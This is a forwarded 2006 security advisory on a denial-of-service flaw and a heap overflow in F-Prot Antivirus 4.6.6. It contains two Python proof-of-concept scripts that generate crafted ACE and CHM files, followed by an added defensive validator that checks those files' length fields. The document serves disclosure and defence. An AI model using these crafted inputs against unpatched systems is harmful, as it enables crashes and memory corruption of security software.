Thread-topic: [UNIX] F-Prot Antivirus Heap Overflow and DoS
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Thursday, December 07, 2006 6:28 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [UNIX] F-Prot Antivirus Heap Overflow and DoS
>
>
> F-Prot Antivirus Heap Overflow and DoS
>
>
>
> Two vulnerabilities in F-Prot Antivirus
> <http://www.f-prot.com/download/home_user/download_fplinux.html>
> 4.6.6 for Unix platforms could allow a remote attacker to
> cause a DoS or execute arbitrary code.
>
>
> 1. ACE file Denial of Service
> When parsing a specially crafted ACE compressed file, F-Prot Antivirus
> will enter an infinite loop.
> See fprot1.py for more details.
>
> 2. CHM file heap overflow
> When parsing a specially crafted CHM file, a heap overflow will occur
> in F-Prot Antivirus.
> See fprot2.py for more details.
>
> Vendor Status:
> Update to F-Prot version 4.6.7:
> http://www.f-prot.com/news/gen_news/061201_release_unix467.html
>
> Exploits:
> # fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS
> #
> # Copyright (c) 2006 Evgeny Legerov
> #
> # Permission to use, copy, modify, and distribute this software for any
> # purpose with or without fee is hereby granted, provided that the above
> # copyright notice and this permission notice appear in all copies.
> #
> # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
> # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
> # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
> # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
> # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
> # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
> # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
> #
> # To test this code on Linux (Python 3):
> #
> # create ACE compressed file
> # $ ./fprot1.py > 1.ace
> # $ f-prot 1.ace
>
> import sys
>
> # Hex dump of the crafted ACE archive, one byte per token; whitespace
> # (including the line breaks) is ignored when it is decoded below.
> ACE = """
> 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14
> 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a
> 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52
> 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff
> 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00
> 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41
> 41 41 41 41 41
> """
>
> # Decode the dump into raw bytes (splitting on any whitespace, so the
> # line breaks in the dump do not glue two bytes together).
> s = bytes.fromhex(ACE)
>
> # Write the binary to the raw stdout so it can be redirected into a file.
> sys.stdout.buffer.write(s)
>
> # fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap
> # overflow
> #
> # Copyright (c) 2006 Evgeny Legerov
> #
> # Permission to use, copy, modify, and distribute this software for any
> # purpose with or without fee is hereby granted, provided that the above
> # copyright notice and this permission notice appear in all copies.
> #
> # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
> # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
> # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
> # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
> # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
> # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
> # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
> #
> # To test this code on Linux (Python 3):
> #
> # $ ./fprot2.py > 1.chm
> # $ f-prot 1.chm
>
> import sys
> import struct
>
> # All fields are little-endian; the "64-bit" offsets and lengths are the
> # 32-bit value followed by four zero bytes.
> s = b""
> s += b"ITSF"                          # signature
> s += struct.pack("<L", 3)             # version
> s += struct.pack("<L", 96)            # header_len
> s += struct.pack("<L", 1)             # unknown
> s += struct.pack("<L", 0x41424344)    # last_modified
> s += struct.pack("<L", 0x419)         # lang_id
> s += b"A" * 16                        # dir_clsid
> s += b"B" * 16                        # stream_clsid
> s += struct.pack("<Q", 96)            # sec0_offset (64-bit)
> s += struct.pack("<Q", 24)            # sec0_len (64-bit)
> s += struct.pack("<Q", 120)           # dir_offset (64-bit)
> s += struct.pack("<Q", 4180)          # dir_len (64-bit)
> s += struct.pack("<Q", 4300)          # data_offset (64-bit)
> s += b"A" * 24                        # 24 bytes at sec0_offset
> s += b"ITSP"                          # directory header signature
> s += struct.pack("<L", 1)             # version
> s += struct.pack("<L", 0x54)          # header_len
> s += struct.pack("<L", 0xa)           # unknown
> s += struct.pack("<L", 1000)          # block_len - BUG?
> s += struct.pack("<L", 2)             # blockidx
> s += struct.pack("<L", 1)             # index_depth
> s += struct.pack("<L", 0xffffffff)    # index_root (-1 as unsigned)
> s += struct.pack("<L", 0)             # index_head
> s += struct.pack("<L", 0)             # index_tail
> s += struct.pack("<L", 0xffffffff)    # unknown2 (-1 as unsigned)
> s += struct.pack("<L", 1)             # num_blocks
> s += struct.pack("<L", 1033)          # lang_id
> s += b"A" * 32                        # remainder of the 0x54-byte ITSP header
> s += b"B" * 10000                     # filler following the directory header
>
> # Write the binary to the raw stdout so it can be redirected into a file.
> sys.stdout.buffer.write(s)
>
>
> Additional Information:
> The original article can be found at:
> http://gleg.net/fprot.txt
>
>
> ================================================================================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ================================================================================
> ================================================================================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>
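Both PoCs quoted above work the same way: a declared length disagrees with the bytes actually present. Under the header layout assumed here, the second header of fprot1.py's archive carries a packed size of 0xffffffd0 although nothing follows it, and fprot2.py's directory header declares a block_len of 1000 (the field its author marks "BUG?") against a 4180-byte directory that contains no real chunk. The validator below is an added example, not part of the SecuriTeam advisory and not F-Prot code; it rebuilds both crafted files inline (constructed input, byte-for-byte what the two scripts emit) and runs the cross-checks a hardened archive parser applies before trusting any length field. The ACE header layout (crc16, header size, type byte, then for file headers packed size at body offset 3 and name length at body offset 29) and the CHM invariant that a directory is the ITSP header followed by exactly num_blocks chunks of block_len bytes, each beginning with PMGL or PMGI, are this example's assumptions; it makes no claim about how F-Prot parses either format or what the root cause of either bug was.

```python
import struct

# Constructed input: the exact bytes the advisory's fprot1.py emits (an ACE
# main header followed by one file header with nothing after it).
ACE_POC = bytes.fromhex("""
58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14
02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a
55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52
53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff
00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00
02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41
41 41 41 41 41
""")

def check_ace(buf):
    """Walk the ACE headers and return the size inconsistencies a hardened
    reader rejects before handing any length to the decompressor. Assumed
    layout (this example's, not F-Prot's): crc16, hdr_size, then hdr_size
    body bytes starting with a type byte; type 0 = main header with "**ACE**"
    at body[3:10]; type 1 = file header with packed_size at body[3:7] and
    fname_len at body[29:31], the packed data following the header."""
    problems = []
    pos = 0
    while pos + 4 <= len(buf):
        _crc, hdr_size = struct.unpack_from("<HH", buf, pos)
        body = buf[pos + 4:pos + 4 + hdr_size]
        if hdr_size < 27 or len(body) != hdr_size or (body[0] == 1 and hdr_size < 31):
            problems.append(f"header at {pos}: size {hdr_size} is too short or overruns the archive")
            break
        if pos == 0 and body[3:10] != b"**ACE**":
            problems.append("main header: missing **ACE** signature")
        next_pos = pos + 4 + hdr_size
        if body[0] == 1:  # file header
            packed = struct.unpack_from("<I", body, 3)[0]
            fname_len = struct.unpack_from("<H", body, 29)[0]
            if 31 + fname_len > hdr_size:
                problems.append(f"file header at {pos}: name length {fname_len} overruns the header")
            remaining = len(buf) - next_pos
            if packed > remaining:
                problems.append(f"file header at {pos}: packed size {packed:#x} exceeds the {remaining} bytes that follow it")
                break  # never loop on a length the archive cannot back
            next_pos += packed
        pos = next_pos
    return problems

ITSF_FMT = "<4sIIIII16s16sQQQQQ"  # 96-byte ITSF header, fields in fprot2.py's order
ITSP_FMT = "<4sIIIIIIIIIIII"      # fixed 52 bytes of the 0x54-byte ITSP directory header

def build_chm(block_len=1000, directory=b"B" * 10000):
    """Constructed input: the defaults give byte-for-byte what the advisory's
    fprot2.py writes; block_len=0x1000 plus a real PMGL chunk gives a
    container the checks accept."""
    itsf = struct.pack(ITSF_FMT, b"ITSF", 3, 96, 1, 0x41424344, 0x419,
                       b"A" * 16, b"B" * 16, 96, 24, 120, 4180, 4300)
    itsp = struct.pack(ITSP_FMT, b"ITSP", 1, 0x54, 0xA, block_len, 2, 1,
                       0xFFFFFFFF, 0, 0, 0xFFFFFFFF, 1, 1033)
    return itsf + b"A" * 24 + itsp + b"A" * 32 + directory

def check_chm(buf):
    """Cross-check every declared CHM length against the buffer and against
    the other declared lengths. Assumed invariant (this example's, not
    F-Prot's): the directory section is the ITSP header followed by exactly
    num_blocks chunks of block_len bytes, each beginning with PMGL or PMGI."""
    size = len(buf)
    if size < 96 or buf[:4] != b"ITSF":
        return ["not an ITSF container"]
    problems = []
    (_, ver, hdr_len, _, _, _, _, _, sec0_off, sec0_len,
     dir_off, dir_len, data_off) = struct.unpack_from(ITSF_FMT, buf, 0)
    if ver != 3 or hdr_len != 96:
        problems.append(f"ITSF: unexpected version {ver} / header_len {hdr_len}")
    for name, off, ln in (("section 0", sec0_off, sec0_len),
                          ("directory", dir_off, dir_len), ("data", data_off, 0)):
        if off + ln > size:
            problems.append(f"{name}: offset {off} + length {ln} exceeds file size {size}")
    if dir_off + 0x54 > size or buf[dir_off:dir_off + 4] != b"ITSP":
        return problems + ["directory: missing or truncated ITSP header"]
    (_, iver, ihdr_len, _, block_len, _, _, _, _, _,
     _, num_blocks, _) = struct.unpack_from(ITSP_FMT, buf, dir_off)
    if iver != 1 or ihdr_len != 0x54:
        problems.append(f"ITSP: unexpected version {iver} / header_len {ihdr_len}")
    if block_len == 0 or num_blocks == 0:
        return problems + ["ITSP: block_len and num_blocks must both be non-zero"]
    payload = dir_len - ihdr_len
    if num_blocks * block_len != payload:  # the field fprot2.py marks "BUG?"
        problems.append(f"ITSP: {num_blocks} block(s) of {block_len} bytes do not tile the {payload}-byte directory payload")
    # Walk only the chunks the file can actually hold, never the declared num_blocks.
    present = max(0, size - dir_off - ihdr_len) // block_len
    for i in range(min(num_blocks, present)):
        start = dir_off + ihdr_len + i * block_len
        if buf[start:start + 4] not in (b"PMGL", b"PMGI"):
            problems.append(f"directory chunk {i}: bad signature {buf[start:start + 4]!r}")
    return problems
```

`check_ace(ACE_POC)` reports the 0xffffffd0 packed size against zero trailing bytes and stops walking; `check_chm(build_chm())` reports both the block_len that does not tile the directory payload and the missing PMGL signature in the first chunk, while `build_chm(0x1000, b"PMGL" + b"\0" * 4092)` passes clean. The design point is that every length is compared with the buffer and with its sibling fields before it drives an allocation or a loop: a parser that allocates by one declared length and reads by another, or lets a declared length run a loop the file cannot back, is exactly what both PoCs probe.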